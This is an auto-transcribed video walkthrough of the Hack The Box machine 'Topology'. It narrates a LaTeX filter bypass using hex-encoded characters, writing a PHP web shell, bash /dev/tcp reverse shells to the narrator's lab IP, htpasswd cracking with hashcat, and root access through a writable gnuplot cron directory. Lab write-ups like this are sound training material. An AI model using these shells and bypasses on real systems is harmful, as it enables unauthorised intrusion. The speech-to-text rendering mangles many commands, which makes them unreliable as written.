backtick a and if we did man asky looked at a we can see that is going to be the decimal notation of a so I was trying really hard to find the decimal notation of backs at unfortunately if we did um with the decimal of backslashes and the back decimal notation of it doesn&#39;t work I don&#39;t know exactly why um let&#39;s see what is it I was trying probably 90265 because 65 was no what is at now search uh 64 so I was trying 9264 and that did not work so the reason is I think you can only just use one character here and back SL a is two and there&#39;s no like decimal notation for that pair but I got over to this page which was the next one down and at is normally going to be 13 I found that out through chat GPT um so they redefined it to be superscript but it says superscript is normally just a carrot right so that would mean if we um did something W 2 Karat and 70 and generate this it&#39;s not going to say 70 it&#39;s going to say p right so that looks good this looks very promising so we could go back to a slash input what was it LST input listing Etsy passwd so the next thing I want to do is make sure this bypass works with um a command I need to put this in inline mode there we go so I&#39;m going to take this p and we&#39;ll do 2 carats and 70 so in case the text is small there for you uh what I put it to is that right so I just replace the p with this and it still works so now we have a potential way to bypass the filter um this page doesn&#39;t want to load uh if you did view this this one talked about um rating of definition file and then using that definition file to rename commands unfortunately um doesn&#39;t help us so this does though so we can do the heximal thing so let&#39;s go back to hack Trix so hack Trix uh the CSV injection I&#39;m going to search latex come on I made a mistake of clicking the page come on maybe I&#39;ll just scroll down passed it oh I&#39;m not even on that page anymore I don&#39;t know what I clicked that&#39;s why there we go so we could try the executing code but I know it doesn&#39;t work so I&#39;m not going to waste your time um let&#39;s try writing a file so I&#39;m going to copy this and first we&#39;re going to show this does not work so V malicious. text we&#39;ll paste it and we&#39;re going to do outfile uh we&#39;ll do shell do PHP and we will write PHP system actually before we do that let&#39;s just write hello world let&#39;s prove we can write things if we over complicate our payload then um it may fail and we won&#39;t know why it failed so let&#39;s keep it as simple as possible so we have this and then we want to put this all on one line so we&#39;re trying to write shell. PHP so let&#39;s grab this copy let&#39;s go to the equation and I&#39;m just going to paste it there and we see illegal command detected so looking at this I see e is pretty much in everything so that&#39;s going to be the thing I replace so let&#39;s try viewing this I&#39;m going to use a search and replace we&#39;ll say e is now uh what is e INX uh it&#39;s 65 go g so now we&#39;ve replaced all e with that so let&#39;s C this again we will copy it and paste so copy paste and I&#39;m hoping we get like a blank page or some generic error right there we go we got a blank page so now we got to find where that shell. PHP is so we can do shell. PHP it is not in the web rot but if we studied the code better I did it because it was in PHP you&#39;ll notice it did a CD to Temp files and that&#39;s what it is the size is 12 to so we wrote to it so if we click it it just says hello world so now let&#39;s edit this and let&#39;s replace hello world with her reverse shell or just a um Cradle so we can launch it so we do PHP system then request CMD and we want to end it and we&#39;ll do a semicolon there so we just put something to execute we can C it let&#39;s send it back over to the web server so if we send this it&#39;s thinking about it it&#39;s still thinking about it there we go it finished finished the file is blank but if we do CMD equals ID it doesn&#39;t work uhoh um I screwed something up here so PHP system request CMD I&#39;m not going to put that semicolon let&#39;s try that still not curse of the demo Gods so PHP system request let&#39;s see so what I&#39;m going to do is stand at my own web server so make D dubdub dub v test PHP paste the script in I see it now syntax highlighting save me I don&#39;t have a parthy there so what I was going to do since I guess this is good troubleshooting uh we can do PHP DS um 8000 dot let&#39;s see colon 8000 Network address is it 127 001 there we go so now we stirred up a PHP server on Local Host so this is very much like the python simple HTTP server except um it can execute PHP code and we still can&#39;t opening period maybe I don&#39;t put the path in let&#39;s just try that just put the IP address there we go that looks better so I did CMD ID um it works the actual code we had though did not have that parenthese right so if I had not notice that and we are running it we would see syntax error um it expected a parenthesis so that&#39;s what&#39;s happening uh let&#39;s go back to our right I can add that Pary in and then once that&#39;s done we can just do the CMD command and everything is going to work there we go so now we get a reverse shell I always um go through burp because I like just doing it in a post request if I can and the reason why I like that is because there&#39;s just less Bad characters in a post request right so I can do B- C b-i Dev TCP 10148 9,10 and one like that let&#39;s encode everything and then we can say NC LVN P 91 send this and we get a shell so let&#39;s do python 3-c import PTY PTY spawn bin bash stty raw minus Echo FG we going export terms equal to X terms so we can clear the screen but now we&#39;re on the server right so if I wanted to get that one file we did before that was in Dev that we just saw an image that HT passed w we can the reason why I don&#39;t see it in that LS of course is um it hides files that begin with a period by default right but now that we have the hash we could try to crack it right and this actually isn&#39;t needed if you got the shell this way um you&#39;re golden right so let&#39;s do V hashes and I&#39;ll call this um HT passwd topology paste that in we can do slash cat and then we&#39;re going to specify D- username because we put the username in with our hash um that wasn&#39;t actually part of it right if I just copied this I wouldn&#39;t need the D- username flag but whenever I crack things I like adding the username as well so when I go back and look at notes I can see what that hash went to so the next thing we do is just specify the hash file and then the word list op wordlist rock. text and hashcat is going to autod detect it and if you&#39;re curious how I just type that directory so fast I did alt period so if we do Echo Please Subscribe and I hit alt period it&#39;s going to grab that very last argument I typed which was the path there so that&#39;s how I did that so quickly we can see it cracked we can scroll up and we see the password is calculus 20 and then if I wanted to we could get rid of R of the dictionary I could just do a D- show and it will just tell me what&#39;s in my pot file that is V daisley here&#39;s the hash and the password of calculus 20 so with that we could log into dev. toy. HTP um I&#39;m in BP Suite let&#39;s turn this off HTTP Dev topology http and then was it V daisley the password and it&#39;s just a static website right but this does go over to SSH so if we were like spraying passwords as we crack them we could try uh V daisley at topology htb um I did not add that into it we could do the IP address or just any subdomain because that goes to the IP put in V DA&#39;s password and we get logged in so from here there&#39;s no difference um dubdub data will be able to do everything that this SSH connection can do um the next step is actually running peace bu to discover a cron but we&#39;ve done that a bunch of other times if you don&#39;t know what I&#39;m talking about about peace buy just go to like ic. Ro type in peace buy and oh my God we run that a lot it&#39;s a really cool tool that shows you when programs run right but I&#39;m going to do it a slightly different way um have the dubdub DU directory right I do so I&#39;m going to copy opt peas Lin peas. over here and we&#39;re going to edit Lin peas because there are a few options that are just defaults and one of them is going to be fast by default it&#39;s set to one which means um it&#39;s not going to wait one minute to check processes and try Su Brute Forces so let&#39;s unset fast so when we unset it a new Option will appear here to us so let&#39;s stand up our web server python 3- mhtp server uh PHP is listening on it where are you PHP kill you start that up Cur Local Host 8000 uh Lin peas. sh type it over to bash uh I don&#39;t know why it&#39;s type Local Host it&#39;s 101048 which is my IP address there we go so LMP is running I do want to put one word of caution out there if you use this PHP thing again it can execute code if you have PHP scripts in like I do with that test.php if someone saw that and they executed it uh they could shell my box right so I typically avoid using this PHP server when I do I always always always specify 1271 don&#39;t do 0000 because you risk um getting yourself owned right so let&#39;s just wait for this Lin peas to finish it&#39;s definitely not in fast mode now so it&#39;s going to take a little bit to run so I&#39;m going to pause the video in order to zoom when it&#39;s done okay so lint peas is done I&#39;m going to first I&#39;m going to copy this because I like using this to jump around linp um sections and I&#39;m going to search for Carlos because Carlos uh pet made it so now I can just search down for that um thing and we can just jump between all the sections is the best way I think to view lmes there&#39;s probably better ways but that&#39;s how I do it so we can look and there&#39;s nothing really too interesting there is this Linux exploit suggest I always say there&#39;s so many false positives there maybe one day I&#39;ll make a video on like why that&#39;s such a hard thing to do but it&#39;s not accurate so I only look at that if I&#39;m really really stuck um we have the cleaned processes this is um unexpected processes run by root uh why&#39; it say that this is just a list of processes um I guess that&#39;s telling us to look for weird and unexpected things right but there&#39;s not that many we can see our reverse shell we see Apache um not that much files open by um belong to other users none credentials in memory none different processes executed during 1 minute so this is where the fast check came in helpful right because we see KRON started and there is a GNU plot cron and it&#39;s going to find any file in op gnu plot that has a PLT extension and then execute it with this so this fine command what this does um the exec it executes gnu plot so this is the binary and this open and close squiggly is going to take the output of find so um let&#39;s see I can probably show that real quick cuz if you don&#39;t use find that often it is a tricky thing so we do find dot we have that if we do D exec and then we&#39;ll do LS and I think we have to do back slash semicolon so it just found that and did an LS if we do a cat it&#39;s going to cat all the files now right so again that exact the way it&#39;s doing it is just um taking the output on the left side and executing it between this hopefully that makes sense but you can see there&#39;s no unique crons that is a Chron that we don&#39;t have permission to read but because we&#39;re examining processes we were able to see it right so it does find and executes gnu plot so the next thing to do would be like searching um let&#39;s do GTFO bin see if it&#39;s there if we search for gnu plot it is not on GTFO bins so let&#39;s just do GT uh gnu plot commands and go to Google and research exactly what this is um it is if you don&#39;t know it&#39;s being used to generate these graphs right on the stats page so we have a quick reference this is a PDF here we go I want the commands so looking at this um which command looks interesting system system generally means run system commands and in this case it does right so we just do system and the command string so if we did um V let&#39;s say let&#39;s go Dev oh it was in what opt gnu plot and we don&#39;t have mission to read the directory if we do a lsla on opt any user well this is um user group and then anyone we have WX which is write execute which means we can go in the directory we can write to the directory if we do touch please subscribe it doesn&#39;t error out um we probably should have done please subscribe to test and we can cat it we can view it but since we don&#39;t have the read permission we can&#39;t list files in this directory um we can also get to it from a webshell right I cat test I can also do it so that&#39;s why I said we don&#39;t need to escalate to V daisly if we found the latex um bypass but having SSH is nice so let&#39;s just create a plot file so I&#39;ll create malicious. PLT we&#39;ll say system and then B- C Bashi Dev TCP 101048 901 like oops um I&#39;m drawing a major uh FR front let&#39;s see what did I use to send the shell zero at and one right yeah that&#39;s all muscle memory once I made a tyer and I wasn&#39;t typing the whole thing I just completely forgot what it was weird okay so now we have the system NC lvmp 901 and I think this runs every minute so if we do a date it&#39;ll probably run in about 20 seconds so while we&#39;re waiting for that if we wanted to get the output of this um we could just use the direct right we could have done um system who am I and then piped it like that and piped to a file right but if we wanted to we could also look in um is it show no we want to look at print because g&amp; plot does allow you to set print to files right so we have print expression this is just like Echo but if we do set print we can see there are different ways to do it right I bet if we did set print and then shell command when we type print it&#39;ll get the output of that shell command as well so that&#39;s another way we could have executed code if system is blacklisted right because we can do this and this is kind of like a pearl thing I think Pearl is one of the few languages I&#39;ve seen that like if you Preen variables with a pipe then it executes command it&#39;s very weird um that does not look like it worked U bash C b-i Dev TCP 101 1480 and one like that that that should work um see name. PLT cat malicious it&#39;s not there anymore is oh tab auto complete doesn&#39;t work because of reasons right because we don&#39;t have rep permission so I&#39;m going to try gnu plot on this file GN U plot invalid command is it lowercase uh let&#39;s see system it may be lowercase there we go we got a shell so now we just wait for the timer there we go it was a new minute right there and we got root so that is pretty much the box if you wanted to see using the print um we could do V malicious. PLT and then something like set print uh let&#39;s do Dev shm [Music] pwned we&#39;ll say output is equal to system let&#39;s just do a who am I and then print output so what that&#39;s going to do is we set the print command to say hey we don&#39;t want to print the standard out we want to print to this file and then we&#39;re running this system command and saying um put the system command in the output variable and then we&#39;re saying print the output variable think that is right let&#39;s see if we go back to print I think that works Let&#39;s see we saved it date uh I think a new minute did pass so Dev shm that did not work V opt gnu plot malicious. PLT let&#39;s see uh we probably need to do a dollar sign and these are things I like doing after I solve the Box again like when I found that latch bypass I had solved the Box the intended way but um I wanted to do it the unintended way as well and they&#39;re doing system in parenthesis so let&#39;s try that as well mirroring this exactly as they have right date we still don&#39;t have it gnu plot malicious. PLT cannot open script file oh um up gnu plot that is probably because we didn&#39;t put it in parentheses so always test your code right uh no data block named output so now it&#39;s working so devm poned is currently V da if I wait the one more section that worked well it is now rout so that is how you can get it to Output to a file hopefully you enjoyed the little bit of debugging session to figure out how that all works um take care guys and I will see you all next time

Transcript for:Topology from Hack the Box Walkthrough

Transcript for:
Topology from Hack the Box Walkthrough